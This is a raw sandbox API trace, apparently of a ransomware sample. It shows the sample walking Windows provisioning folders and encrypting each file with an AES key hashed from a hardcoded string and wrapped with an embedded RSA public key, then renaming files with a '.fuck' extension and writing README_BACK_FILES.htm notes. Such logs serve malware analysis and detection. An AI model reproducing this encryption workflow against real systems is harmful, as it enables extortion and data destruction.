lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\RunTime\\*.*", lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0x2845e20 [0237.446] FindNextFileA (in: hFindFile=0x2845e20, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0237.446] FindNextFileA (in: hFindFile=0x2845e20, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0237.446] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e59c | out: lpSystemTimeAsFileTime=0x2b9e59c) [0237.446] GetLastError () returned 0x5 [0237.446] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\RunTime\\Power_0.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\runtime\\power_0.provxml")) returned 0x20 [0237.447] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\RunTime\\Power_0.provxml", dwFileAttributes=0x80) returned 0 [0237.448] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\RunTime\\Power_0.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\runtime\\power_0.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.448] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\RunTime\\Power_0.provxml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\runtime\\power_0.provxml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.448] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\RunTime\\Power_0.provxml.gsg", dwFileAttributes=0x2) returned 0 [0237.448] CryptAcquireContextA (in: phProv=0x2b9d598, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d598*=0x2844198) returned 1 [0237.454] CryptCreateHash (in: hProv=0x2844198, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d59c | out: phHash=0x2b9d59c) returned 1 [0237.454] lstrlenA (lpString="TVpGTgobjlbbFWBWIZZuaMfWzMlQm") returned 29 [0237.454] CryptHashData (hHash=0x2845e60, pbData=0x2ecb70, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0237.454] CryptDeriveKey (in: hProv=0x2844198, Algid=0x6610, hBaseData=0x2845e60, dwFlags=0x1000000, phKey=0x2b9d588 | out: phKey=0x2b9d588*=0x2845f60) returned 1 [0237.454] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0237.454] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d5a4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580 | out: pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580) returned 1 [0237.454] CryptAcquireContextA (in: phProv=0x2b9d594, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d594*=0x28444c8) returned 1 [0237.455] CryptImportPublicKeyInfo (in: hCryptProv=0x28444c8, dwCertEncodingType=0x1, pInfo=0x283c198*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x283c1c8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x283c1d0*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d58c | out: phKey=0x2b9d58c*=0x28462a0) returned 1 [0237.455] CryptEncrypt (in: hKey=0x28462a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d57c*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d57c*=0x80) returned 1 [0237.455] CryptEncrypt (in: hKey=0x28462a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2844cc0*, pdwDataLen=0x2b9d590*=0x18, dwBufLen=0x80 | out: pbData=0x2844cc0*, pdwDataLen=0x2b9d590*=0x80) returned 1 [0237.456] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2844cc0, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0237.456] ReadFile (in: hFile=0xffffffff, lpBuffer=0x284ed48, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x284ed48, lpNumberOfBytesRead=0x2b9d5a0*=0x0, lpOverlapped=0x0) returned 0 [0237.456] CryptEncrypt (in: hKey=0x2845f60, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x284ed48*, pdwDataLen=0x2b9d5a0*=0x0, dwBufLen=0x400 | out: pbData=0x284ed48*, pdwDataLen=0x2b9d5a0*=0x10) returned 1 [0237.456] WriteFile (in: hFile=0xffffffff, lpBuffer=0x284ed48, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0237.456] CloseHandle (hObject=0xffffffff) returned 1 [0237.456] CloseHandle (hObject=0xffffffff) returned 1 [0237.456] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\RunTime\\Power_0.provxml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\runtime\\power_0.provxml.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\RunTime\\Power_0.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\runtime\\power_0.provxml"), bFailIfExists=0) returned 0 [0237.456] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\RunTime\\Power_0.provxml", dwFileAttributes=0x0) returned 0 [0237.457] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\RunTime\\Power_0.provxml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\runtime\\power_0.provxml.gsg")) returned 0 [0237.457] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\RunTime\\Power_0.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\runtime\\power_0.provxml"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\RunTime\\Power_0.provxml.fuck" (normalized: "c:\\programdata\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\runtime\\power_0.provxml.fuck")) returned 0 [0237.457] CryptDestroyHash (hHash=0x2845e60) returned 1 [0237.457] CryptDestroyKey (hKey=0x2845f60) returned 1 [0237.457] CryptReleaseContext (hProv=0x2844198, dwFlags=0x0) returned 1 [0237.457] FindNextFileA (in: hFindFile=0x2845e20, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0 [0237.457] FindClose (in: hFindFile=0x2845e20 | out: hFindFile=0x2845e20) returned 1 [0237.458] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\RunTime\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\runtime\\readme_back_files.htm")) returned 0xffffffff [0237.458] AreFileApisANSI () returned 1 [0237.458] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28443b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 113 [0237.458] CreateFileW (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\RunTime\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\runtime\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e810, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.458] GetLastError () returned 0x5 [0237.458] GetLastError () returned 0x5 [0237.458] FindNextFileA (in: hFindFile=0x28464e0, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0237.458] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e938 | out: lpSystemTimeAsFileTime=0x2b9e938) [0237.459] GetLastError () returned 0x5 [0237.459] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\RunTime.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\runtime.xml")) returned 0x20 [0237.473] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\RunTime.xml", dwFileAttributes=0x80) returned 0 [0237.474] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\RunTime.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\runtime.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.474] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\RunTime.xml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\runtime.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.474] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\RunTime.xml.gsg", dwFileAttributes=0x2) returned 0 [0237.475] CryptAcquireContextA (in: phProv=0x2b9d934, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d934*=0x2843e68) returned 1 [0237.480] CryptCreateHash (in: hProv=0x2843e68, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d938 | out: phHash=0x2b9d938) returned 1 [0237.480] lstrlenA (lpString="TVpGTgobjlbbFWBWIZZuaMfWzMlQm") returned 29 [0237.480] CryptHashData (hHash=0x2846320, pbData=0x2ec878, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0237.480] CryptDeriveKey (in: hProv=0x2843e68, Algid=0x6610, hBaseData=0x2846320, dwFlags=0x1000000, phKey=0x2b9d924 | out: phKey=0x2b9d924*=0x2846360) returned 1 [0237.480] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0237.480] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d940, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c | out: pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c) returned 1 [0237.480] CryptAcquireContextA (in: phProv=0x2b9d930, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d930*=0x2844198) returned 1 [0237.482] CryptImportPublicKeyInfo (in: hCryptProv=0x2844198, dwCertEncodingType=0x1, pInfo=0x283c268*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x283c298*, PublicKey.cbData=0x8c, PublicKey.pbData=0x283c2a0*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d928 | out: phKey=0x2b9d928*=0x2846420) returned 1 [0237.482] CryptEncrypt (in: hKey=0x2846420, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d918*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d918*=0x80) returned 1 [0237.482] CryptEncrypt (in: hKey=0x2846420, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2844660*, pdwDataLen=0x2b9d92c*=0x18, dwBufLen=0x80 | out: pbData=0x2844660*, pdwDataLen=0x2b9d92c*=0x80) returned 1 [0237.482] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2844660, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0237.482] ReadFile (in: hFile=0xffffffff, lpBuffer=0x276d6a0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d93c, lpOverlapped=0x0 | out: lpBuffer=0x276d6a0, lpNumberOfBytesRead=0x2b9d93c*=0x0, lpOverlapped=0x0) returned 0 [0237.482] CryptEncrypt (in: hKey=0x2846360, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x276d6a0*, pdwDataLen=0x2b9d93c*=0x0, dwBufLen=0x400 | out: pbData=0x276d6a0*, pdwDataLen=0x2b9d93c*=0x10) returned 1 [0237.482] WriteFile (in: hFile=0xffffffff, lpBuffer=0x276d6a0, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0237.483] CloseHandle (hObject=0xffffffff) returned 1 [0237.483] CloseHandle (hObject=0xffffffff) returned 1 [0237.483] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\RunTime.xml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\runtime.xml.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\RunTime.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\runtime.xml"), bFailIfExists=0) returned 0 [0237.483] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\RunTime.xml", dwFileAttributes=0x0) returned 0 [0237.483] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\RunTime.xml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\runtime.xml.gsg")) returned 0 [0237.484] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\RunTime.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\runtime.xml"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\RunTime.xml.fuck" (normalized: "c:\\programdata\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\runtime.xml.fuck")) returned 0 [0237.484] CryptDestroyHash (hHash=0x2846320) returned 1 [0237.484] CryptDestroyKey (hKey=0x2846360) returned 1 [0237.484] CryptReleaseContext (hProv=0x2843e68, dwFlags=0x0) returned 1 [0237.484] FindNextFileA (in: hFindFile=0x28464e0, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0 [0237.484] FindClose (in: hFindFile=0x28464e0 | out: hFindFile=0x28464e0) returned 1 [0237.484] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\readme_back_files.htm")) returned 0xffffffff [0237.485] AreFileApisANSI () returned 1 [0237.485] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2b20, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0237.485] CreateFileW (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ebac, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.485] GetLastError () returned 0x5 [0237.485] GetLastError () returned 0x5 [0237.485] FindNextFileA (in: hFindFile=0x2846220, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0 [0237.485] FindClose (in: hFindFile=0x2846220 | out: hFindFile=0x2846220) returned 1 [0237.485] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\readme_back_files.htm")) returned 0xffffffff [0237.485] AreFileApisANSI () returned 1 [0237.485] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2f58, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 100 [0237.485] CreateFileW (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ef48, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.486] GetLastError () returned 0x5 [0237.486] GetLastError () returned 0x5 [0237.486] FindNextFileA (in: hFindFile=0x2816f58, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0237.486] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\*.*", lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0x2846220 [0237.486] FindNextFileA (in: hFindFile=0x2846220, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0237.486] FindNextFileA (in: hFindFile=0x2846220, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0237.486] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9ecd4 | out: lpSystemTimeAsFileTime=0x2b9ecd4) [0237.486] GetLastError () returned 0x5 [0237.487] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\customizations.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\customizations.xml")) returned 0x20 [0237.487] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\customizations.xml", dwFileAttributes=0x80) returned 0 [0237.487] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\customizations.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\customizations.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.487] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\customizations.xml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\customizations.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.488] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\customizations.xml.gsg", dwFileAttributes=0x2) returned 0 [0237.488] CryptAcquireContextA (in: phProv=0x2b9dcd0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9dcd0*=0x2843e68) returned 1 [0237.493] CryptCreateHash (in: hProv=0x2843e68, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9dcd4 | out: phHash=0x2b9dcd4) returned 1 [0237.493] lstrlenA (lpString="TVpGTgobjlbbFWBWIZZuaMfWzMlQm") returned 29 [0237.493] CryptHashData (hHash=0x2846320, pbData=0x2ecb20, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0237.493] CryptDeriveKey (in: hProv=0x2843e68, Algid=0x6610, hBaseData=0x2846320, dwFlags=0x1000000, phKey=0x2b9dcc0 | out: phKey=0x2b9dcc0*=0x28464e0) returned 1 [0237.493] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0237.494] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9dcdc, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8 | out: pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8) returned 1 [0237.494] CryptAcquireContextA (in: phProv=0x2b9dccc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9dccc*=0x28443b8) returned 1 [0237.495] CryptImportPublicKeyInfo (in: hCryptProv=0x28443b8, dwCertEncodingType=0x1, pInfo=0x283c338*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x283c368*, PublicKey.cbData=0x8c, PublicKey.pbData=0x283c370*, PublicKey.cUnusedBits=0x0), phKey=0x2b9dcc4 | out: phKey=0x2b9dcc4*=0x2846520) returned 1 [0237.495] CryptEncrypt (in: hKey=0x2846520, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x80) returned 1 [0237.496] CryptEncrypt (in: hKey=0x2846520, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28442a8*, pdwDataLen=0x2b9dcc8*=0x18, dwBufLen=0x80 | out: pbData=0x28442a8*, pdwDataLen=0x2b9dcc8*=0x80) returned 1 [0237.497] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28442a8, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0237.497] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2763190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x2763190, lpNumberOfBytesRead=0x2b9dcd8*=0x0, lpOverlapped=0x0) returned 0 [0237.497] CryptEncrypt (in: hKey=0x28464e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2763190*, pdwDataLen=0x2b9dcd8*=0x0, dwBufLen=0x400 | out: pbData=0x2763190*, pdwDataLen=0x2b9dcd8*=0x10) returned 1 [0237.497] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2763190, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0237.497] CloseHandle (hObject=0xffffffff) returned 1 [0237.497] CloseHandle (hObject=0xffffffff) returned 1 [0237.497] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\customizations.xml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\customizations.xml.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\customizations.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\customizations.xml"), bFailIfExists=0) returned 0 [0237.497] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\customizations.xml", dwFileAttributes=0x0) returned 0 [0237.498] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\customizations.xml.gsg" (normalized: 